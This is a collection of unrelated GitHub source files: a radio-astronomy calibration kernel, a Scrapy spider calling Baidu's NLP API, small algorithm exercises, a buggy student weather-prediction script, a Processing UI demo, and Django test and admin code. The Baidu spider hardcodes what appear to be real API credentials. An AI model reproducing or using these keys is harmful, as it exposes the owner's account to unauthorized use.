jhj[d,bt,bf,aa,0,0] += (m00*m00.conjugate() + m01*m01.conjugate())\n jhj[d,bt,bf,aa,1,1] += (m10*m10.conjugate() + m11*m11.conjugate())\n\n@jit(nopython=True, fastmath=True, parallel=use_parallel, cache=use_cache, nogil=True)\ndef compute_jhr(gh, jh, r, jhr, t_int=1, f_int=1):\n \"\"\"\n Given the conjugate gains, J\\ :sup:`H` and the residual (or observed data, in special cases),\n computes J\\ :sup:`H`\\R. J\\ :sup:`H`\\R is computed over intervals.\n\n Args:\n gh (np.complex64 or np.complex128):\n Typed memoryview of gain array with dimension (d, ti, fi, a, c, c).\n jh (np.complex64 or np.complex128):\n Typed memoryview of J\\ :sup:`H` array with dimensions (d, m, t, f, a, a, c, c).\n r (np.complex64 or np.complex128):\n Typed memoryview of residual array with dimensions (m, t, f, a, a, c, c).\n jhr (np.complex64 or np.complex128):\n Typed memoryview of J\\ :sup:`H`\\R array with dimensions (d, ti, fi, a, c, c).\n t_int (int):\n Number of time slots per solution interval.\n f_int (int):\n Number of frequencies per solution interval.\n \"\"\"\n\n n_dir = jh.shape[0]\n n_mod = jh.shape[1]\n n_tim = jh.shape[2]\n n_fre = jh.shape[3]\n n_ant = jh.shape[4]\n g_dir = gh.shape[0]\n\n all_bls = np.array([[i,j] for i in range(n_ant) for j in range(n_ant) if i!=j])\n n_bl = all_bls.shape[0]\n\n broadcast_times = np.array([t//t_int for t in range(n_tim)])\n broadcast_freqs = np.array([f//f_int for f in range(n_fre)])\n broadcast_dirs = np.array([d%g_dir for d in range(n_dir)])\n\n for ibl in prange(n_bl):\n aa, ab = all_bls[ibl,0], all_bls[ibl,1]\n for i in range(n_mod):\n for t in range(n_tim):\n bt = broadcast_times[t]\n for f in range(n_fre):\n bf = broadcast_freqs[f]\n for d in range(n_dir):\n bd = broadcast_dirs[d]\n\n r00 = r[i,t,f,aa,ab,0,0]\n r01 = r[i,t,f,aa,ab,0,1]\n r10 = r[i,t,f,aa,ab,1,0]\n r11 = r[i,t,f,aa,ab,1,1]\n\n jhh00 = jh[d,i,t,f,ab,aa,0,0]\n jhh01 = jh[d,i,t,f,ab,aa,0,1]\n jhh10 = jh[d,i,t,f,ab,aa,1,0]\n jhh11 = jh[d,i,t,f,ab,aa,1,1]\n\n jhr[d,bt,bf,aa,0,0] += gh[bd,bt,bf,aa,0,0] * (r00*jhh00 + r01*jhh10)\n jhr[d,bt,bf,aa,1,1] += gh[bd,bt,bf,aa,1,1] * (r10*jhh01 + r11*jhh11)\n\n@jit(nopython=True, fastmath=True, parallel=use_parallel, cache=use_cache, nogil=True)\ndef compute_update(jhr, jhjinv, upd):\n \"\"\"\n Given J\\ :sup:`H`\\R and (J\\ :sup:`H`\\J)\\ :sup:`-1`, computes the gain update. The dimensions of\n the input should already be consistent, making this operation simple. These arrays are real\n valued.\n\n Args:\n jhr (np.float32 or np.float64):\n Typed memoryview of J\\ :sup:`H`\\R array with dimensions (d, ti, fi, a, c, c).\n jhjinv (np.float32 or np.float64):\n Typed memoryview of (J\\ :sup:`H`\\J)\\ :sup:`-1` array with dimensions\n (d, ti, fi, a, c, c).\n upd (np.float32 or np.float64):\n Typed memoryview of gain update array with dimensions (d, ti, fi, a, c, c).\n \"\"\"\n\n n_dir = jhr.shape[0]\n n_tim = jhr.shape[1]\n n_fre = jhr.shape[2]\n n_ant = jhr.shape[3]\n\n for aa in prange(n_ant):\n for t in range(n_tim):\n for f in range(n_fre):\n for d in range(n_dir):\n upd[d,t,f,aa,0,0] = jhjinv[d,t,f,aa,0,0]*jhr[d,t,f,aa,0,0]\n upd[d,t,f,aa,0,1] = upd[d,t,f,aa,1,0] = 0\n upd[d,t,f,aa,1,1] = jhjinv[d,t,f,aa,1,1]*jhr[d,t,f,aa,1,1]\n\n# Remaining kernel functions are reused.\n\n# J^H is computed assuming diagonal gains.\ncompute_jh = diag_complex.compute_jh\n\n# J^H.J inverse is computed assuming diagonal blocks.\ncompute_jhjinv = generics.compute_diag_inverse\n\n# Residuals computed assuming diagonal gains.\ncompute_residual = diag_complex.compute_residual\n\n# Corrected visibilities computed assuming diagonal gains.\ncompute_corrected = diag_complex.compute_corrected\n\n# Gains applied as diagonal.\napply_gains = diag_complex.apply_gains\n\n# Gains inverted as diagonal.\ninvert_gains = generics.compute_diag_inverse\n","repo_name":"ratt-ru/CubiCal","sub_path":"cubical/kernels/phase_only.py","file_name":"phase_only.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"}
+{"seq_id":"71896641831","text":"from scrapy import Spider, Request\nimport pymongo\nimport json\nfrom aip import AipNlp\n\nfrom ltp.settings import tdb\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '10209496'\nAPI_KEY = 'MrUvMIK1x0kI2wsxZ5wrxZuU'\nSECRET_KEY = 'at8ObT3K6ruzgB4tg2TIz9Tb8visZkY8'\n\nclient = AipNlp(APP_ID, API_KEY, SECRET_KEY)\napi_url='https://aip.baidubce.com/rpc/2.0/nlp/v2/comment_tag'\n\nclass BDSpider(Spider):\n name = 'BD'\n\n def start_requests(self):\n comments = tdb.meituan_comment.find({'baidu_result': None})\n for item in comments:\n yield Request(url=api_url,method='POST',body={\n \"text\": \"三星电脑电池不给力\",\n \"type\": 13\n })\n\n\n\n","repo_name":"xudaashuai/ChanXueYanCrawl","sub_path":"ltp/spiders/BDSpider.py","file_name":"BDSpider.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"70120275750","text":"# Find all pairs of integers whose sum is equal to a given number\nfrom typing import List, Tuple, Set\n\n\ndef two_sum(numbers: List[int], target: int) -> List[Tuple[int, int]]:\n result: List[Tuple[int, int]] = list()\n seen: Set[int] = set()\n\n for value in numbers:\n complement = target - value\n\n if complement in seen:\n result.append((value, complement))\n\n seen.add(value)\n\n return result\n\n\nprint(two_sum([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 5))\n","repo_name":"pupo84/algorithms-data-structures","sub_path":"list/exercises/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29808828016","text":"#Author: BrennaNieva\n#Date: 10/15/2019\n#Description: CSCI 141 [40828] ML Project for Weather Prediction\n\n\n\n###############################################################################\n\nATTRS = []\nATTRS.append(\"Station\")\nATTRS.append(\"Location\")\nATTRS.append(\"Date\")\nATTRS.append(\"Precipitation\")\nATTRS.append(\"TMAX\")\nATTRS.append(\"TMIN\")\nATTRS.append(\"TOBS\")\n#Time of Observation Bias\n# different times of day exert different temperatures, TOBS used to caluc\n\n\n###############################################################################\n\n\n\ndef make_training_set(Jan2019):\n \"\"\" Compiles a training set from JAN2019 (CSV file) and creates dictionary (weather_records) with attributes labeled Station, Location, Date, Precipitation, Max Temperature (TMAX) and Minimum Temperature(TMIN)\n \n \"\"\"\n\n\n\n weather_records = []\n # Read in file\n with open(Jan2019) as file:\n #Skip header line in file\n next(file)\n for line in file:\n if '#' in line:\n continue\n line = line.strip('\\n')\n line_list = line.split(',')\n\n # Create a dictionary for the line and map the attributes in\n # ATTRS to the corresponding values in the line of the file\n record = {}\n\n # Read Station ID as an string:\n record[ATTRS[0]] = str(line_list[0].strip(\"\\\"\"))\n\n #Read Location as a string:\n record[ATTRS[1]] = str(line_list[1].strip(\"\\\"\"))\n\n #Read Date as a string:\n record[ATTRS[2]] = str(line_list[3].strip(\"\\\"\"))\n\n #Read Precipitation as a float:\n record[ATTRS[3]] = str(line_list[4].strip(\"\\\"\"))\n\n #Checks if TMAX and TMIN are empty, if so, sets their value to 0\n #Avoids list overflow error\n if line_list[5].strip(\"\\\"\") == '':\n record[ATTRS[4]] = 0\n record[ATTRS[5]] = 0\n else:\n #Read TMAX as a int:\n record[ATTRS[4]] = int(line_list[5].strip(\"\\\"\"))\n\n #Read TMIN as a int:\n record[ATTRS[5]] = int(line_list[6].strip(\"\\\"\"))\n\n # Add the dictionary to a list\n weather_records.append(record)\n\n\n return weather_records\n\n\n\n#Executes function and prints the results\ntraining_data = (make_training_set('TrainingSets/Jan2019.csv'))\n# print(training_data)\n\n\ndef compute_mean(list):\n ''' Computes the average of the list'''\n average = sum(list) / len(list)\n return average\n\ndef compare_predictions(predictions,today):\n '''Compares the difference between the prediction and \"todays\" actual temperature'''\n for i in predictions:\n \n comparision = i - int(today)\n return comparision\n\ndef predict_equal(yesterday):\n '''Takes yesterday's temperature and calculates that tomorrows temperature will be the same as yesterday'''\n \n\n \n\n TomorrowTempPredict = int(training_data[i-1].get('TMAX'))\n\n return TomorrowTempPredict\n\n \ndef predict_linear(yesterday):\n '''Calculates tomorrow's temperature as a linear relationship by using yesterday's temperature and the day before yesterday'''\n\n yesterday = int(training_data[i-1].get('TMAX'))\n \n today_tmax = int(training_data[i].get('TMAX'))\n\n \n two_days_tmax = int(training_data[i-2].get('TMAX'))\n\n\n TomorrowTempPredict = today_tmax + (yesterday - two_days_tmax)\n return TomorrowTempPredict\n\n\n \n \n\n\n#Calculates single date's temp difference\n\nif __name__ == \"__main__\":\n\n data_viewed = input(\"To view all weather data from Jan2019, type 'view_all' \\n otherwise, please specifiy a date to forecast the following day's temperature (YYYY-MM-DD): \")\n\n if data_viewed == \"view_all\":\n lin_predictions = []\n eq_predictions = []\n lin_errors = []\n eq_errors = []\n \n\n for i in range(len(training_data)):\n today = training_data[i]\n yesterday = training_data[i-1]\n\n today_tmax = int(training_data[i].get('TMAX'))\n today_tmin = int(training_data[i].get('TMIN'))\n\n\n lin_predictions.append(predict_linear(today))\n eq_predictions.append(predict_equal(today))\n\n lin_errors.append(compare_predictions(lin_predictions, today_tmax))\n eq_errors.append(compare_predictions(eq_predictions, today_tmax))\n\n\n\n lin_avg_error = compute_mean(lin_errors)\n eq_avg_error = compute_mean(eq_errors)\n\n print(\"linear predictions: \")\n print(lin_predictions)\n print(\"equal predictions: \")\n print(eq_predictions)\n\n print(\"linear errors: \")\n print(lin_errors)\n\n print(\"equal errors: \")\n print(eq_errors)\n\n print(\"Average error [linear]: \")\n print(lin_avg_error)\n\n print(\"Average error [equal]: \")\n print(eq_avg_error)\n\n else:\n\n print(\"linear prediction: \", predict_linear((data_viewed)))\n print(\"equal prediction: \", predict_equal((data_viewed)))\n\n\n\n\n\n\n\n \n\n \n\n\n\n\n\n\n#To DO\n\n#Take average error for equal\n#Fix Equal Temperature\n#finish CSV parse\n#csv docs\n\n\n\n\n#prediction mech to all take the same arguments so that we can easily swap them in and out\n#given all days at the index of the one you want to predict, here are the different prediction methods and their output\n\n\n\n\n","repo_name":"brennanieva/WeatherPredict","sub_path":"train_copy_so_i_dont_fuck_it_up.py","file_name":"train_copy_so_i_dont_fuck_it_up.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74484113829","text":"from datetime import datetime\nfrom helper import *\nfrom editor import *\nfrom dialog import *\n\nclass DemoCtrl(Pub,Sub):\n def __init__(self):\n Pub.__init__(self)\n Sub.__init__(self,self.recv)\n self.ml,self.mt,self.mr,self.mb=10,10,10,10\n self.sbht=27\n self.kmode='cmd' # choose from cmd, edit, dlg\n self.t=0.0\n self.flipflop=False\n self.wnds=[]\n frmrect(self.ml,self.mt,width-self.ml-self.mr,height-self.mt-self.mb-self.sbht,10)\n self.fontocra=createFont('OCRA',14)\n self.bounds=[self.ml+5,self.mt+5,width-self.ml-self.mr-10,height-self.mt-self.mb-self.sbht-10]\n rootwnd=Voidwnd(self.bounds[0],self.bounds[1],self.bounds[2],self.bounds[3])\n self.wnds.insert(0,rootwnd)\n self.actwnd=0\n self.dlgwnd=None\n \n def recv(self,m):\n hdr=m.head\n car,cdr=m.body[0],m.body[1:]\n if car=='stat':\n self.stat('[%s] %s'%(hdr,cdr[0]))\n elif car=='mvbuf':\n self.stat('renaming current buffer to %s'%cdr[0])\n self.wnds[self.actwnd].nm=cdr[0]\n self.dlgwnd=None\n self.kmode='cmd'\n self.renderall()\n else:\n self.stat('unknown msg cmd: %s'%car)\n \n def stat(self,msg):\n fill(0)\n stroke(0)\n rect(0,height-self.sbht,width-1,height-self.sbht)\n stroke(0,255,0)\n fill(0,255,0)\n textFont(self.fontocra)\n textSize(14)\n textAlign(LEFT,TOP)\n text('| %s |'%msg,5,height-self.sbht+3)\n noFill()\n \n def mkdlg(self,promptmsg):\n if self.dlgwnd:\n self.stat('dialog currently active!')\n return\n self.stat('readying dialog prompt...')\n dw=300\n dh=100\n self.dlgwnd=Txtdlg(width/2-dw/2,height/2-dh/2,dw,dh,promptmsg)\n self.dlgwnd.addsub(self)\n self.kmode='dlg'\n \n def mked(self,nm):\n if self.actwnd==-1:\n self.stat('no active window')\n return\n self.stat('ed...')\n if isinstance(self.wnds[self.actwnd],Ed):\n print('cannot overwrite current editor!')\n return\n vw=self.wnds[self.actwnd]\n self.wnds[self.actwnd]=Ed(vw.x,vw.y,vw.w,vw.h,nm)\n self.wnds[self.actwnd].addsub(self)\n \n def renderall(self):\n wiperect(self.bounds[0],self.bounds[1],self.bounds[2],self.bounds[3],color(0,0,0))\n for i in range(len(self.wnds)):\n if i==self.actwnd:\n self.wnds[i].render(color(0,255,0))\n else:\n self.wnds[i].render(color(0,128,0))\n if self.dlgwnd:\n self.dlgwnd.wipe()\n self.dlgwnd.render(color(0,255,128))\n \n def blinkcursor(self):\n if self.kmode=='edit':\n self.t+=0.05\n if frameCount%50==0:\n if self.flipflop:\n self.wnds[self.actwnd].rendercursor(color(0,255,0))\n else:\n self.wnds[self.actwnd].rendercursor(color(0,0,0))\n self.flipflop=not self.flipflop\n \n def vsplit(self,frac):\n self.stat('vertical split')\n cw=self.wnds[self.actwnd]\n cw.wipe()\n wfrac=frac*cw.w\n rfrac=cw.w-wfrac\n mp=cw.x+wfrac\n dmw=3\n cw.w=wfrac-dmw\n nw=Voidwnd(mp+dmw,cw.y,rfrac-dmw,cw.h)\n self.wnds.insert(self.actwnd+1,nw)\n \n def hsplit(self,frac):\n self.stat('horizontal split')\n cw=self.wnds[self.actwnd]\n cw.wipe()\n hfrac=frac*cw.h\n rfrac=cw.h-hfrac\n mp=cw.y+hfrac\n dmh=3\n cw.h=hfrac-dmh\n nw=Voidwnd(cw.x,mp+dmh,cw.w,rfrac-dmh)\n self.wnds.insert(self.actwnd+1,nw)\n \n def bye(self):\n self.stat('bye!')\n exit()\n \n def screenshot(self):\n self.stat('screengrab')\n save('img/demo_01a_%s.png'%(datetime.today().strftime('%Y%m%d_%H%M%S')))\n \n def nextwnd(self):\n self.actwnd=(self.actwnd+1)%len(self.wnds)\n self.stat('active window index: %d'%self.actwnd)\n \n def prevwnd(self):\n self.actwnd-=1\n if self.actwnd<0:\n self.actwnd=len(self.wnds)-1\n self.stat('active window index: %d'%self.actwnd)\n \n def insmode(self):\n if self.actwnd==-1:\n self.stat('no editor active!')\n elif not isinstance(self.wnds[self.actwnd],Ed):\n self.stat('active window is not an editor!')\n else:\n self.stat('- insert -')\n self.kmode='edit'\n \n def writecurbuf(self):\n if self.actwnd==-1:\n self.stat('no editor active!')\n elif not isinstance(self.wnds[self.actwnd],Ed):\n self.stat('active window is not an editor!')\n else:\n self.wnds[self.actwnd].savebuffer()\n \n def loadfile(self):\n pass\n \n def cmdhandler(self,k,kc):\n print('[cmd] (%s,%s)'%(kc,k))\n if k=='q':\n self.bye()\n if k=='s':\n self.screenshot()\n elif k=='v':\n self.vsplit(0.5)\n elif k=='V':\n self.vsplit(0.75)\n elif k=='h':\n self.hsplit(0.5)\n elif k=='H':\n self.hsplit(0.75)\n elif k=='n':\n self.nextwnd()\n elif k=='p':\n self.prevwnd()\n elif k=='e':\n self.mked('%s'%(datetime.today().strftime('%Y%m%d_%H%M%S')))\n elif k=='i':\n self.insmode()\n elif k=='w':\n self.writecurbuf()\n elif k=='o':\n self.loadfile()\n elif k=='r':\n self.mkdlg('new current buffer name:')\n self.renderall()\n \n def currenteditor(self):\n return self.wnds[self.actwnd]\n","repo_name":"heerdyes/processing-sketching","sub_path":"demo/dvI/democtrl.py","file_name":"democtrl.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73059847588","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n if not root:\n return root\n queue = collections.deque()\n tempQueue = collections.deque()\n queue.append(root)\n while queue:\n curNode = queue.popleft()\n if curNode.left:\n tempQueue.append(curNode.left)\n if curNode.right:\n tempQueue.append(curNode.right)\n if queue:\n nextNode = queue.popleft()\n curNode.next = nextNode\n queue.insert(0, nextNode)\n else:\n curNode.next = None\n queue.extend(tempQueue)\n tempQueue.clear() \n return root\n","repo_name":"darkleoyue/Leetcode_practice_python","sub_path":"117.py","file_name":"117.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1035509419","text":"import pytest\n\nfrom introduction_fixtures import Address, Gender, Person\n\n@pytest.fixture\ndef address():\n return Address(\n stree_address=\"123 Main Street\",\n postal_code=\"12345\",\n city=\"Anytown\",\n country=\"USA\",\n )\n \n@pytest.fixture\ndef person(address):\n return Person(\n first_name=\"John\",\n last_name=\"Doe\",\n gender=Gender.MALE,\n birthdate=\"1991-01-01\",\n interests=[\"travel\", \"sports\"],\n address=address,\n )\n\ndef test_address_country(address):\n assert address.country == \"USA\"\n \ndef test_person_first_name(person):\n assert person.first_name == \"John\"\n \ndef test_person_address_city(person):\n assert person.address.city == \"Anytown\"","repo_name":"dimsplendid/fastapi-data-science","sub_path":"chapter9/introduction_fixtures_test.py","file_name":"introduction_fixtures_test.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36131307271","text":"import pytest\nfrom creator.files.models import File, FileType\nfrom creator.ingest_runs.models import IngestRun\nfrom creator.ingest_runs.tasks import (\n run_ingest,\n cancel_ingest,\n cancel_validation,\n ingest_genomic_workflow_output_manifests,\n)\nfrom creator.ingest_runs.factories import ValidationRunFactory, ValidationRun\n\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\n@pytest.fixture\ndef mock_enqueue(mocker):\n \"\"\"\n Mock the django_eq.enqueue function.\n \"\"\"\n enqueue = mocker.patch(\"creator.ingest_runs.tasks.django_rq.enqueue\")\n return enqueue\n\n\ndef test_run_ingest(db, mocker, clients, prep_file):\n \"\"\"\n Test the run_ingest function.\n \"\"\"\n client = clients.get(\"Administrator\")\n mock_genomic_workflow = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_run\"\n \".ingest_genomic_workflow_output_manifests\"\n )\n user = User.objects.first()\n\n # Create data. The last Version will have a non-GWO FileType\n for _ in range(3):\n prep_file(authed=True)\n files = list(File.objects.all())\n for file_ in files[:-1]:\n file_.file_type = FileType.GWO.value\n file_.save()\n file_versions = [f.versions.first() for f in files]\n\n \"\"\"\n 1) Happy Case\n Call run_ingest. Check that genomic_file_workflow got\n called. Check that ir.state == 'completed'.\n \"\"\"\n happy_versions = file_versions[:-1]\n # An initial IngestRun with no issues\n happy_ir = setup_ingest_run(happy_versions, user)\n run_ingest(happy_ir.id)\n\n assert IngestRun.objects.all().count() == 1\n mock_genomic_workflow.assert_called_once()\n mock_genomic_workflow.reset_mock()\n happy_ir = IngestRun.objects.get(pk=happy_ir.id)\n assert happy_ir.state == \"completed\"\n assert not happy_ir.error_msg\n\n \"\"\"\n 2) Non-GWO Case\n Call run_ingest on an IngestRun with a version that doesn't have a GWO\n root_file. Exception should be raised, and state should become failed.\n \"\"\"\n bad_ir = setup_ingest_run(file_versions, user)\n with pytest.raises(Exception):\n assert run_ingest(bad_ir.id)\n bad_ir = IngestRun.objects.get(pk=bad_ir.id)\n assert bad_ir.state == \"failed\"\n assert \"Unknown file type detected\" in bad_ir.error_msg\n\n \"\"\"\n 3) Exception Case\n Call run_ingest on an IngestRun with all GWO versions. Mock out\n _ingest_genomic_workflow_manifest_ and give it an exception side effect\n and check that the IngestRun goes to a failed state.\n \"\"\"\n ER = \"ERROR\"\n except_ir = setup_ingest_run(happy_versions[:1], user)\n mock_genomic_workflow.side_effect = Exception(ER)\n with pytest.raises(Exception):\n run_ingest(except_ir.id)\n mock_genomic_workflow.assert_called_once()\n except_ir = IngestRun.objects.get(pk=except_ir.id)\n assert except_ir.state == \"failed\"\n assert ER == except_ir.error_msg\n\n\ndef test_ingest_gwo_feat_flag(db, clients, mocker, prep_file, settings):\n \"\"\"\n Test that running the GWO manifest ingest pipeline does not work when the\n feature flag is turned off.\n \"\"\"\n client = clients.get(\"Administrators\")\n settings.FEAT_INGEST_GENOMIC_WORKFLOW_OUTPUTS = False\n mock_genomic_workflow = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_genomic_workflow_output_manifests\"\n )\n\n user = User.objects.first()\n # Create data.\n for _ in range(3):\n prep_file(authed=True)\n files = list(File.objects.all())\n versions = []\n for file_ in files:\n file_.file_type = FileType.GWO.value\n file_.save()\n versions.append(file_.versions.first())\n\n ir = setup_ingest_run(versions, user)\n with pytest.raises(Exception) as ex:\n run_ingest(ir.id)\n assert str(ex.value).startswith(\"Ingesting genomic workflow\")\n assert IngestRun.objects.all().count() == 1\n ir = IngestRun.objects.get(pk=ir.id)\n assert ir.state == \"failed\"\n assert \"output manifests is not enabled\" in ir.error_msg\n mock_genomic_workflow.assert_not_called()\n\n\ndef test_cancel_ingest(db, clients, prep_file):\n \"\"\"\n Test the cancel_ingest function.\n \"\"\"\n client = clients.get(\"Administrators\")\n\n # Create some data\n for i in range(2):\n prep_file(authed=True)\n file_versions = [f.versions.first() for f in File.objects.all()]\n user = User.objects.first()\n ir = setup_ingest_run(file_versions, user)\n ir.start()\n ir.start_cancel()\n ir.save()\n cancel_ingest(ir.id)\n ir = IngestRun.objects.get(pk=ir.id)\n assert IngestRun.objects.all().count() == 1\n assert ir.state == \"canceled\"\n\n\ndef test_cancel_validation(db, clients):\n \"\"\"\n Test the cancel_validation function.\n \"\"\"\n # Create a validation run\n vr = ValidationRunFactory()\n vr.initialize()\n vr.start()\n vr.start_cancel()\n vr.save()\n cancel_validation(vr.pk)\n vr = ValidationRun.objects.get(pk=vr.pk)\n assert ValidationRun.objects.all().count() == 1\n assert vr.state == \"canceled\"\n\n\ndef test_ingest_genomic_workflow_output_manifests(\n db, clients, prep_file, mocker\n):\n \"\"\"\n Test the _ingest_genomic_workflow_output_manifests_ function.\n \"\"\"\n mock_ingest = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_run.GenomicDataLoader.ingest_gwo\"\n )\n mock_extract = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_run.extract_data\",\n return_value=[{\"Test\": \"Test\"}],\n )\n for _ in range(2):\n prep_file(authed=True)\n file_versions = [f.versions.first() for f in File.objects.all()]\n user = User.objects.first()\n ir = setup_ingest_run(file_versions, user)\n ingest_genomic_workflow_output_manifests(ir)\n mock_ingest.assert_called_once()\n\n\ndef setup_ingest_run(file_versions, user):\n ir = IngestRun()\n ir.creator = user\n ir.initialize()\n ir.save()\n ir.versions.set(file_versions)\n ir.save()\n return ir\n","repo_name":"kids-first/kf-api-study-creator","sub_path":"tests/ingest_runs/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"9792683188","text":"from django.contrib import admin\nfrom .models import Currency, Config, Contractor, Company, Customer, Supplier, Country, \\\n Warehouse, FreightPackingType, FPIdentified, Unit, Product, \\\n OrderDoc, OrderProductTable, AcceptFPUnknownDoc, InspectFPDoc, InspectFPTable, \\\n WayBillDoc, WayBillProductTable, AcceptFPUnknownTable, WayBillStatus, InspectProductDoc, InspectProductTable, \\\n MyUser, Phone\nfrom django.contrib.contenttypes.admin import GenericTabularInline\n\n\nclass PhoneInline(GenericTabularInline):\n model = Phone\n list_display = ['number']\n fields = ['number']\n extra = 1\n\n\nclass OrderProductInline(admin.TabularInline):\n model = OrderProductTable\n fields = OrderProductTable.form_edit_fields()\n list_display = OrderProductTable.table_fields()\n extra = 1\n\n\nclass PhoneAdmin(admin.ModelAdmin):\n def Telephone_reg_column(self, obj):\n return obj.content_object if obj.content_object else None\n\n fieldsets = [\n ('Телефоны контрагентов :', {'fields': ['number', 'content_type', 'content_object']}),\n ]\n\n readonly_fields = ['content_object', 'content_type']\n\n list_display = Phone.telephones_table_fields()\n\n\nclass OrderAdmin(admin.ModelAdmin):\n list_display = OrderDoc.table_fields()\n fields = OrderDoc.form_edit_fields()\n inlines = [\n OrderProductInline,\n ]\n\n\nclass WaybillProductInline(admin.TabularInline):\n model = WayBillProductTable\n fields = WayBillProductTable.form_edit_fields()\n list_display = WayBillProductTable.table_fields()\n extra = 1\n\n\n# class WaybillFreightPackingInline(admin.TabularInline):\n# model = WaybillFreightPacking\n# list_display = WaybillFreightPacking.table_fields()\n# fields = WaybillFreightPacking.form_edit_fields()\n# extra = 1\n\n\n# class FreightPackingAcceptedInline(admin.TabularInline):\n# model = AcceptFPUnknownTable\n# list_display = AcceptFPUnknownTable.table_fields()\n# fields = AcceptFPUnknownTable.form_edit_fields()\n# extra = 1\n\n\nclass WayBillStatusAdmin(admin.ModelAdmin):\n def doc_reg_column(self, obj):\n return obj.doc_reg if obj.doc_reg else None\n\n list_display = WayBillStatus.table_fields()\n # fields = WayBillStatus.form_edit_fields()\n doc_reg_column.short_description = u'Регистратор'\n\n fieldsets = [\n (None, {'fields': ['dt', 'wb', 'status', 'desc', 'content_type', 'object_id', 'doc_reg']}),\n ]\n readonly_fields = ['doc_reg']\n\n\nclass WayBillStatusInline(GenericTabularInline):\n model = WayBillStatus\n list_display = WayBillStatus.table_fields()\n fields = WayBillStatus.form_edit_fields()\n extra = 1\n\n\nclass WaybillAdmin(admin.ModelAdmin):\n list_display = WayBillDoc.table_fields()\n fields = WayBillDoc.form_edit_fields()\n inlines = [\n WaybillProductInline,\n # FreightPackingAcceptedInline,\n # WaybillFreightPackingInline,\n # WayBillStatusInline,\n ]\n\n def get_status(self, obj):\n object_status = WayBillStatus.objects.filter(\n wb=obj\n ).order_by('-dt').first()\n if object_status:\n try:\n return list((filter(lambda x: object_status.status in x, object_status.STATUS)))[0][1]\n except:\n pass\n return 'Нет зарегистрированных статусов'\n\n get_status.short_description = u'Статус ТТН'\n\n def get_inline_instances(self, request, obj=None):\n to_return = super(WaybillAdmin, self).get_inline_instances(request, obj)\n # Разрешаем добавлять в связанные таблицы только если ТНТ уже существует\n if not obj:\n # to_return = [x for x in to_return if not isinstance(x, WaybillProductInline)]\n to_return = []\n return to_return\n\n\nclass AcceptFPUnknownTableInline(admin.TabularInline):\n model = AcceptFPUnknownTable\n list_display = AcceptFPUnknownTable.table_fields()\n fields = AcceptFPUnknownTable.form_edit_fields()\n extra = 1\n\n\nclass AcceptFPUnknownDocAdmin(admin.ModelAdmin):\n list_display = AcceptFPUnknownDoc.table_fields()\n fields = AcceptFPUnknownDoc.form_edit_fields()\n inlines = [\n AcceptFPUnknownTableInline,\n ]\n\n\nclass InspectFPTableInline(admin.TabularInline):\n model = InspectFPTable\n list_display = InspectFPTable.table_fields()\n fields = InspectFPTable.form_edit_fields()\n extra = 1\n\n\nclass InspectFPDocAdmin(admin.ModelAdmin):\n list_display = InspectFPDoc.table_fields()\n fields = InspectFPDoc.form_edit_fields()\n inlines = [\n InspectFPTableInline,\n ]\n\n\nclass InspectProductTableInline(admin.TabularInline):\n model = InspectProductTable\n list_display = InspectProductTable.table_fields()\n fields = InspectProductTable.form_edit_fields()\n extra = 1\n\n\nclass InspectProductDocAdmin(admin.ModelAdmin):\n list_display = InspectProductDoc.table_fields()\n fields = InspectProductDoc.form_edit_fields()\n inlines = [\n InspectProductTableInline,\n ]\n\n\nclass ProductAdmin(admin.ModelAdmin):\n list_display = Product.table_fields()\n fields = Product.form_edit_fields()\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n list_display = Currency.table_fields()\n fields = Currency.form_edit_fields()\n\n\nclass CountryAdmin(admin.ModelAdmin):\n list_display = Country.table_fields()\n fields = Country.form_edit_fields()\n\n\nclass WarehouseAdmin(admin.ModelAdmin):\n list_display = Warehouse.table_fields()\n fields = Warehouse.form_edit_fields()\n\n\nclass FreightPackingTypeAdmin(admin.ModelAdmin):\n list_display = FreightPackingType.table_fields()\n fields = FreightPackingType.form_edit_fields()\n\n\nclass UnitAdmin(admin.ModelAdmin):\n list_display = Unit.table_fields()\n fields = Unit.form_edit_fields()\n\n\nclass FreightPackingAdmin(admin.ModelAdmin):\n list_display = FPIdentified.table_fields()\n fields = FPIdentified.form_edit_fields()\n list_filter = ('fp_type',)\n\n\nclass ContractorAdmin(admin.ModelAdmin):\n list_filter = ('contractor_type', 'country')\n list_display = Contractor.table_fields()\n search_fields = Contractor.table_fields()\n # fields = Contractor.form_edit_fields()\n fieldsets = (\n (None, {\n 'fields': (\n ('contractor_type', 'code', 'name'), 'country',\n )\n }),\n ('Наименования', {\n 'classes': ('collapse',),\n 'fields': (\n 'name_legal',\n ('first_name', 'last_name'),\n ),\n }),\n ('Налоговые коды', {\n 'classes': 